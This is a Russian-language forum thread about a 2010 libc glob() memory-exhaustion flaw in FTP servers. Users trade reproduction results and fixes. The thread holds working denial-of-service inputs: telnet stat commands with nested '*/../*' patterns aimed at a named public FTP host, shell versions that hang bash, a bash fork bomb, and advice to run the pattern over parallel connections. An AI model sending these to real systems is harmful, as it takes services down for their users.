The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Ошибка в библиотке libc привела к уязвимости большинства FTP..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +1 +/
Сообщение от opennews on 07-Окт-10, 17:56 
Ошибка в реализации функции glob() в различных Си-библиотеках, например в glibc и BSD libc (http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-...),  может быть использована удалённым атакующим, чтобы нарушить работу FTP/SFTP серверов. В связи с тем, что на многих серверах разрешён анонимный вход, ошибку легко эксплуатировать и многие программные продукты являются уязвимыми. В отчёте (http://securityreason.com/securityalert/7822) утверждается, что серверы даже таких крупных компаний, как Adobe и HP, подвержены этой проблеме.


Проблема возникла из-за того, что переменная GLOB_LIMIT, которую добавили в 2001 году для ограничения объёма памяти функцией glob() c целью защиты от аналогичной уязвимости (https://www.opennet.ru/base/netsoft/1007055482_116.txt.html), не эффективна. Проверка на совпадение (globbing) вызывает функцию glob(), чтобы сравнить список файлов с шаблоном и вернуть на выход список совпадающих файлов. В виду того, что GLOB_LIMIT не действует в сит...

URL: http://securityreason.com/securityalert/7822
Новость: https://www.opennet.ru/opennews/art.shtml?num=28210

Высказать мнение | Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +6 +/
Сообщение от anonymus on 07-Окт-10, 17:56 
Закроют, чай не мелокомягкие
Ну и в серьезных проектах совсем без ошибок не бывает, как это не печально.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

2. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +11 +/
Сообщение от Аноним (??) on 07-Окт-10, 17:56 
vsftpd не использует, ни glob(), ни fnmatch().
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

8. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +2 +/
Сообщение от Аноним (??) on 07-Окт-10, 18:45 
> vsftpd не использует, ни glob(), ни fnmatch().

Спасибо! А то я уже полез апдейты смотреть :)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

4. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от анонимус (??) on 07-Окт-10, 18:04 
У меня на сервачке uClibc. Можно спать спокойно?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

7. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +6 +/
Сообщение от EuPhobos (ok) on 07-Окт-10, 18:43 
> У меня на сервачке uClibc. Можно спать спокойно?

А можно IP вашего сервачка?

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

26. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +5 +/
Сообщение от Аноним (??) on 07-Окт-10, 20:50 
192.168.1.13 =)
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

33. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  –1 +/
Сообщение от АдминистыйБородач on 07-Окт-10, 21:46 
Эй, откуда ты узнал секретный адрес моего банковского терминала?!


Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

32. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от БородатыйОдмин on 07-Окт-10, 21:44 
Легко! 10.11.12.13
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

36. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от EuPhobos (ok) on 07-Окт-10, 21:51 
> Легко! 10.11.12.13

За натом в основном всегда можно спать спокойно, но кайфа от НАТ-а никакого )

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

40. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  –10 +/
Сообщение от User294 (ok) on 07-Окт-10, 22:26 
> А можно IP вашего сервачка?

127.0.0.1

Удачного взлома! :)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

47. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +5 +/
Сообщение от pavlinux (ok) on 08-Окт-10, 00:46 
>> А можно IP вашего сервачка?
>127.0.0.1
>Удачного взлома! :)

Вроде не тинэйджер... :/

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

75. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +4 +/
Сообщение от AdVv (ok) on 08-Окт-10, 16:15 
>>> А можно IP вашего сервачка?
>>127.0.0.1
>>Удачного взлома! :)
> Вроде не тинэйджер... :/

Физический возраст не всегда соответствует умственному развитию :(

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

79. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от User294 (ok) on 08-Окт-10, 17:44 
> Вроде не тинэйджер... :/

Да просто локальный DoS как-то особо не получился. А я то уж понадеялся OOM киллером отхватить :)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

5. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +3 +/
Сообщение от maxkit (ok) on 07-Окт-10, 18:36 
>  серверы даже таких крупных компаний, как Adobe

Переживут. Весь мир на дырявом Flash'е сидит.

Но новость, конечно, неприятная.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

6. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +13 +/
Сообщение от Аноним (??) on 07-Окт-10, 18:41 
vsftpd подтверждает своё название
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

74. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от fakedream on 08-Окт-10, 16:14 
Еще бы он пофункциональнее был чуть ..
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

9. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от luzerz on 07-Окт-10, 18:53 
эксплоит то где?)
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

13. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +1 +/
Сообщение от аноним on 07-Окт-10, 19:21 
> эксплоит то где?)

$ telnet ftp.microsoft.com 21
user anonymous
pass opennet
stat */../*/../*/../*/../*
stat */../*/../*/../*/../*test
и весь эксплоит

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

16. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +1 +/
Сообщение от ноним on 07-Окт-10, 19:53 
т.е. на локальной фс stat */../*/../*/../*/../*  тоже сработает ?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

35. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от Аноним (??) on 07-Окт-10, 21:48 
Работает, zsh отъедает по 4 мега в секунду. Правда, я не стал дожидаться, пока память кончится, и прибил.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

52. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от Аноним (??) on 08-Окт-10, 07:52 
> Работает, zsh отъедает по 4 мега в секунду. Правда, я не стал
> дожидаться, пока память кончится, и прибил.

забавно, в csh, на fb8:
# stat */../*/../*/../*/../*
/usr/sbin/stat: Argument list too long.


proftpd-1.3.2b:
stat */../*/../*/../*/../*/../*
211-Status of */../*/../*/../*/../*/../*:
End of status
211 Out of memory during globbing of */../*/../*/../*/../*/../*

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

64. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от MrClon email on 08-Окт-10, 10:02 
220 ProFTPD 1.3.2d Server (MrClon Server) [192.168.10.1]
user anonymous
331 Anonymous login ok, send your complete email address as your password
pass evil_hucker
230 Anonymous access granted, restrictions apply
stat */../*/../*/../*/../*
550 */../*/../*/../*/../*: Forbidden command argument
stat */../*/../*/../*/../*test
550 */../*/../*/../*/../*test: Forbidden command argument

Что я делаю не так? Может «експлоит» кривой?

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

10. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  –1 +/
Сообщение от аноним on 07-Окт-10, 18:54 
че-то по-моему этот баг только в bsd и есть. ProFTPd выдает банальный:
211 Out of memory during globbing of */../....
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

12. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +1 +/
Сообщение от аноним on 07-Окт-10, 19:18 
У меня на фре 8.1 так же. А на линуксе proftpd упал.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

44. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +1 +/
Сообщение от oops (ok) on 07-Окт-10, 23:42 
freebsd 8.1 amd64 + pure-ftpd - все ок, ничего не падает.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

51. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от pimiento email(ok) on 08-Окт-10, 07:01 
gentoo i686, pure-ftpd не упало
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

11. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от Stax (ok) on 07-Окт-10, 19:01 
Ну в редхате поддерживается только vsftpd, который "проблеме не подвержен", так что наверное у них нет необходимости дергаться и резко латать проблему. Потихонечку исправят.. Строго говоря, по оригинальной ссылке сказано, кто подвержен проблеме: netbsd/openbsd/freebsd/solaris, системы adobe/hp/etc, а про редхат, дебиан и пр. ничего не сказано.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

87. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +2 +/
Сообщение от XoRe (ok) on 08-Окт-10, 21:59 
> Ну в редхате поддерживается только vsftpd, который "проблеме не подвержен", так что
> наверное у них нет необходимости дергаться и резко латать проблему. Потихонечку
> исправят.. Строго говоря, по оригинальной ссылке сказано, кто подвержен проблеме: netbsd/openbsd/freebsd/solaris,
> системы adobe/hp/etc, а про редхат, дебиан и пр. ничего не сказано.

Скажите, а вы правда не знаете, что такое glibc?

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

14. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от Dmitriy.trt on 07-Окт-10, 19:21 
В Debian используется eglibc. Возможно, там просто нет этой проблемы.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

17. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +3 +/
Сообщение от Sylvia (ok) on 07-Окт-10, 19:55 
eglibc - набор патчей над glibc
если уж в bsd libc есть ошибка, то в форке от glibc и подавно


интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы ? и насколько это может быть использовано злоумышленниками

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

19. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от аноним on 07-Окт-10, 20:17 
> интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы ? и насколько это может быть использовано злоумышленниками

Конечно, баш, например:
  ls */../*/../*/../*/../*
эффект будет примерно эквивалентный
  -(){ -&-;};-
в смысле, сожрет всю память и повесит машину, если не настроены правильные лимиты

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

22. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от Аноним (??) on 07-Окт-10, 20:38 
$ ls */../*/../*/../*/../*
bash: /bin/ls: Слишком длинный список аргументов
$
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

24. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от аноним on 07-Окт-10, 20:48 
> bash: /bin/ls: Слишком длинный список аргументов

А так?
echo /*/*/../*/../*/../*/../*

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

27. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от аноним on 07-Окт-10, 20:51 
> А так?
> echo /*/*/../*/../*/../*/../*

По сабжевой статье там должен быть несуществующий файл, то есть:
  echo /*/*/../*/../*/../*/../*fake

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

29. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от Иван Иванович Иванов on 07-Окт-10, 21:39 
bash: Killed out of memory

Клёво :) Local DOS :)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

48. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от prapor (??) on 08-Окт-10, 02:48 
А на ZSH не сработало. Проц жрёт и всё. Память не меняется.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

53. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +1 +/
Сообщение от Аноним (??) on 08-Окт-10, 07:57 
> А на ZSH не сработало. Проц жрёт и всё. Память не меняется.

В csh тоже тупо одно ядро съедет и все, правда еще пришлось через -9 убивать

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

58. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от oops (ok) on 08-Окт-10, 09:04 
а у меня на csh по-тихоньку память жрало
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

66. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от тигар (ok) on 08-Окт-10, 10:18 
сколько ждал?
я минут 5, память не жрало, только, как написали выше проц, 1 ядро. head, i386, 3 недельной давности
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

23. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от anonymous (??) on 07-Окт-10, 20:40 
где можно статейку прочитать про настройку этих димитов?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

25. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +1 +/
Сообщение от аноним on 07-Окт-10, 20:49 
> где можно статейку прочитать про настройку этих димитов?

man limits.conf

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

57. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от аноним on 08-Окт-10, 09:01 
>> интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы ? и насколько это может быть использовано злоумышленниками
> Конечно, баш, например:
>   ls */../*/../*/../*/../*
> эффект будет примерно эквивалентный
>   -(){ -&-;};-
> в смысле, сожрет всю память и повесит машину, если не настроены правильные
> лимиты

На Debian начало отъедать память, пришлось килять

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

68. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от Doc_x800 on 08-Окт-10, 11:43 
>>> интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы ? и насколько это может быть использовано злоумышленниками
>> Конечно, баш, например:
>>   ls */../*/../*/../*/../*
>> эффект будет примерно эквивалентный
>>   -(){ -&-;};-
>> в смысле, сожрет всю память и повесит машину, если не настроены правильные
>> лимиты
> На Debian начало отъедать память, пришлось килять

OpenSUSE 11.3
Linux Doc 2.6.31.5-0.1-default #1 SMP 2009-10-26 15:49:03 +0100 i686 i686 i386 GNU/Linux

та же ситуация

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

20. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +3 +/
Сообщение от аноним on 07-Окт-10, 20:23 
> и насколько это может быть использовано злоумышленниками

может быть использовано для подвешивания собственной машины :)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

62. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от zazik (ok) on 08-Окт-10, 09:41 
> eglibc - набор патчей над glibc
> если уж в bsd libc есть ошибка, то в форке от glibc
> и подавно
> интересно другое, кроме ФТП серверов вызывают ли glob() какие либо еще программы
> ? и насколько это может быть использовано злоумышленниками

Через php/perl/etc можно сделать а-ля exec('glob ...').

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

15. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от Аноним (??) on 07-Окт-10, 19:26 
пока что имеем уязвимость не в большинстве фтп серверов, а только в proftpd
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

54. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от Аноним (??) on 08-Окт-10, 07:59 
> пока что имеем уязвимость не в большинстве фтп серверов, а только в
> proftpd

proftpd-1.3.2b под freebsd: 211 Out of memory during globbing of /*/*/../*/../*/../*/../*fake

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

18. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +1 +/
Сообщение от ананим on 07-Окт-10, 19:57 
несправедливо мс исключена из упоминания:
>Affected Vendors (not verified):
>- - Apple
>- - Microsoft Interix
>- - HP
>- - more more more

.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

88. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от XoRe (ok) on 08-Окт-10, 22:05 
> несправедливо мс исключена из упоминания:
>>Affected Vendors (not verified):
>>- - Apple
>>- - Microsoft Interix
>>- - HP
>>- - more more more

not verified

P.S.
На генте х64 bash с такой строкой жрет проц, но память жрет только до 158 метров.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

21. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +1 +/
Сообщение от Аноним (??) on 07-Окт-10, 20:32 
Vsftpd проблеме не подвержен.

Ну очень радует)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

28. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от diceman (??) on 07-Окт-10, 21:14 
на фре proftpd выдал листинг файла с правами, владельцами и прочим
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

55. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от Аноним (??) on 08-Окт-10, 08:00 
> на фре proftpd выдал листинг файла с правами, владельцами и прочим

сделай команду подлинее, получишь: 211 Out of memory during globbing

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

80. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от аноним on 08-Окт-10, 18:02 
> сделай команду подлинее, получишь: 211 Out of memory during globbing

Если "Out of memory" - это еще хорошо. Это значит что ошибка была корректно обработана. А если оно подвиснет на несколько минут - то это дос.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

63. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от QuAzI (ok) on 08-Окт-10, 09:51 
Как? Как ты это сделал, демон?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

41. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от evgeny_t (ok) on 07-Окт-10, 22:58 
stat */../*/../*/../*/../*
bash: /usr/bin/stat: Argument list too long
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

43. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от PereresusNeVlezaetBuggy email(ok) on 07-Окт-10, 23:06 
Ключевой diff: http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c....

Кривой он какой-то... и сделан аж три месяца назад. Приплыли, товарищи.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

45. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от V (??) on 08-Окт-10, 00:30 
что-то не получается у меня повесить proftpd под openbsd
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

46. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от PereresusNeVlezaetBuggy email(ok) on 08-Окт-10, 00:34 
> что-то не получается у меня повесить proftpd под openbsd

Видимо, корректно обрабатываются ситуации с нехваткой памяти.

Я проверил на ksh — отожрало вплоть до лимита, выругалось на нехватку, и начало постепенно отдавать память взад.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

91. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от PereresusNeVlezaetBuggy email(ok) on 09-Окт-10, 09:42 
>> что-то не получается у меня повесить proftpd под openbsd
> Видимо, корректно обрабатываются ситуации с нехваткой памяти.
> Я проверил на ksh — отожрало вплоть до лимита, выругалось на нехватку,
> и начало постепенно отдавать память взад.

Фикс для OpenBSD таки закоммичен: http://marc.info/?l=openbsd-cvs&m=128657455002435&w=2

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

50. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от r9ft on 08-Окт-10, 06:52 
Ubuntu:

stat */../*/../*/../*/../*
550 */../*/../*/../*/../*: Forbidden command argument
stat */../*/../*/../*/../*test
550 */../*/../*/../*/../*test : Forbidden command argument

в bash echo /*/*/../*/../*/../*/../*test - начинает сжирать память

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

77. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от User294 (ok) on 08-Окт-10, 17:41 
На 64-битной при попытке сделать stat на такую строку - баш съедает гига полтора и минут 5 тупит. После чего сообщает Argument list too long. Работает сугубо под рутом и только если сменить текущую диру на /. В общем у меня полноценного локального DoS особо не получилось, только возможность скушать прилично ресурсов на несколько минут.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

59. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от i (??) on 08-Окт-10, 09:04 
pureftpd в gentoo не падает, bash память жрет... но лимиты спасают.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

60. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от phantom lord (ok) on 08-Окт-10, 09:14 
Отлично, как раз юзаю Vsftpd :-)
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

61. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от Аноним (??) on 08-Окт-10, 09:15 
в макоси bash память жрет тоже и умирает
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

67. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от QuAzI (ok) on 08-Окт-10, 10:36 
Забавно.
proftpd-1.3.2b   - бага не проявилась.
proftpd-1.3.3a_1 - бага проявилась.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

69. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от sysnet.by on 08-Окт-10, 14:18 
SLES 11.0
ProFTPD 1.3.2b Server - )))))))) только корректное сообщение о "дебильной" команде

220 ProFTPD 1.3.2b Server (FTP Skif) [10.34.0.114]
331 Password required for spectre
Password:
230 User spectre logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls */../*/../*/../*/../*/../*
229 Entering Extended Passive Mode (|||7126|)
150 Opening ASCII mode data connection for file list
226-Out of memory during globbing of */../*/../*/../*/../*/../*
226 Transfer complete
ftp>

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

70. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от zazik (ok) on 08-Окт-10, 14:25 
У меня bash уперся в 3 гига и так и остался висеть.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

71. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от MrClon email on 08-Окт-10, 14:31 
Какая ОС, версия libc, bash ну и так далее?
На своём debian сервере и бубунтовых рабочих станциях так и не смог воспроизвести баг :(
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

72. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от zazik (ok) on 08-Окт-10, 14:37 
> Какая ОС, версия libc, bash ну и так далее?
> На своём debian сервере и бубунтовых рабочих станциях так и не смог
> воспроизвести баг :(

OpenSUSE(как релиз посмотреть - не знаю, это не удобнейшая фря), libc-2.11.1,
GNU bash, version 3.2.51(1)-release (x86_64-suse-linux-gnu)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

84. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от аноним on 08-Окт-10, 19:17 
> OpenSUSE(как релиз посмотреть - не знаю

Вроде, везде работает:
cat /etc/*release*

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

86. "Ошибка в библиотЕке libc привела к уязвимости большинства FTP"  +1 +/
Сообщение от аноним on 08-Окт-10, 21:54 
> Вроде, везде работает:
> cat /etc/*release*

Точно
cat /etc/*/../*/../*/../*/../*release

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

93. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от zazik (ok) on 11-Окт-10, 10:35 
>> OpenSUSE(как релиз посмотреть - не знаю
> Вроде, везде работает:
> cat /etc/*release*

# cat /etc/SuSE-release
SUSE Linux Enterprise Server 11 (x86_64)
VERSION = 11
PATCHLEVEL = 1

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

73. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от Nas_tradamus email(ok) on 08-Окт-10, 15:30 
На Pure не прокатило, слава зайцам.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

78. "'прокатываемость' зависит от параметра"  +/
Сообщение от аноним on 08-Окт-10, 17:43 
> На Pure не прокатило, слава зайцам.

С какими параметрами не прокатило? Там подходящий путь зависит от приложения и количества подкаталогов. У меня на proftpd команда:
  stat */../*/../*/../*/../*/../*
выдает 211 Out of memory during globbing of ...
но команда:
  stat */../*/../*/../*/../*
подвешивает proftpd и сжирает 100% cpu. Сделать это 10 раз на параллельных соединенях - и DoS готов.

И, да, дополнительно надо проверять:
  stat */../*/../*/../*/../*testtest
это должно почти не требовать памяти, но подвесит точно так же.

PS: блин, вроде не лор же, а такие простые замечания приходится делать...

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

81. "'прокатываемость' зависит от параметра"  +/
Сообщение от Nas_tradamus email(ok) on 08-Окт-10, 18:17 
>[оверквотинг удален]
>   stat */../*/../*/../*/../*/../*
> выдает 211 Out of memory during globbing of ...
> но команда:
>   stat */../*/../*/../*/../*
> подвешивает proftpd и сжирает 100% cpu. Сделать это 10 раз на параллельных
> соединенях - и DoS готов.
> И, да, дополнительно надо проверять:
>   stat */../*/../*/../*/../*testtest
> это должно почти не требовать памяти, но подвесит точно так же.
> PS: блин, вроде не лор же, а такие простые замечания приходится делать...

Да блин, я все понимаю. В Pure-FTPD вообще не работают никакие комбинации.

ftp> stat */../*/../*/../*/../*/../*
Connected to ftp.site.ru.
No proxy connection.
Mode: stream; Type: binary; Form: non-print; Structure: file
Verbose: on; Bell: off; Prompting: on; Globbing: on
Store unique: off; Receive unique: off
Case: off; CR stripping: on
Quote control characters: on
Ntrans: off
Nmap: off
Hash mark printing: off; Use of PORT cmds: on
Tick counter printing: off
ftp>


Игрался минут 5 с stat, ls и добавлением фэйкового файла в конце - не работает.

В ProFTPD работает, как и в bash. Но на моих серваках с ProFTPD нет левых людей и анонимусов.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

82. "'прокатываемость' зависит от параметра"  +/
Сообщение от аноним on 08-Окт-10, 19:07 
> ftp> stat */../*/../*/../*/../*/../*

А через ftp оно и у меня не работало. Зато работало через telnet.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

83. "'прокатываемость' зависит от параметра"  +/
Сообщение от аноним on 08-Окт-10, 19:11 
> ftp> stat ...

stat в ftp-клиенте имеет другое назначение. Это - не тот stat. :)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

85. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +1 +/
Сообщение от аноним on 08-Окт-10, 21:47 
Решение для proftpd - вписать в proftpd.conf:
  UseGlobbing off

ЗЫ: дежавю? http://bugs.proftpd.org/show_bug.cgi?id=1066

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

90. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от V (??) on 09-Окт-10, 00:02 
2001-й год, 5 баллов! :)
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

92. "Ошибка в библиотке libc привела к уязвимости большинства FTP..."  +/
Сообщение от аноним on 10-Окт-10, 00:08 
того и гляди злобные анонимусы будут ходить по серверам и их "тестировать"... а может и робота-обходчика подрядят...
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Спонсоры:
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2021 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру